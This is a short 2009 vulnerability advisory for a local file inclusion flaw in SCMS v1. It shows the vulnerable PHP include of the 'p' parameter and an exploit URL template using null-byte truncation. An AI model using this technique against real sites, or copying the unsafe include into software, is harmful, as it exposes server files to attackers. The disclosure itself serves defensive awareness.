SCMS v1 (index.php p) Local File Inclusion Vulnerability

2009-01-18 06:33:39

--:local file include:--
---------------------------------
script:simple content management system v 1

-------------------------------------------------------
download from:http://futurekast.com/fcms/php/SCMSv1.zip

-------------------------------------------------------

...............................................
vul:/index.php line 34:

<?php
if (!isset($_GET['p']))
include("../SCMSv1/includes/default.txt");
} else include("includes/" . $_GET['p'] . ".txt");
?>
-------------------------------------------
-------------------------------------------
xpl:

http://127.0.0.1/path/index.php?p=[Lfi]%00

***************************************************
***************************************************
---------------------------------------------------
Author: ahmadbady [[email protected]]

from:[iran]
---------------------------------------------------

#

Fixes

No fixes

In order to submit a new fix you need to be registered.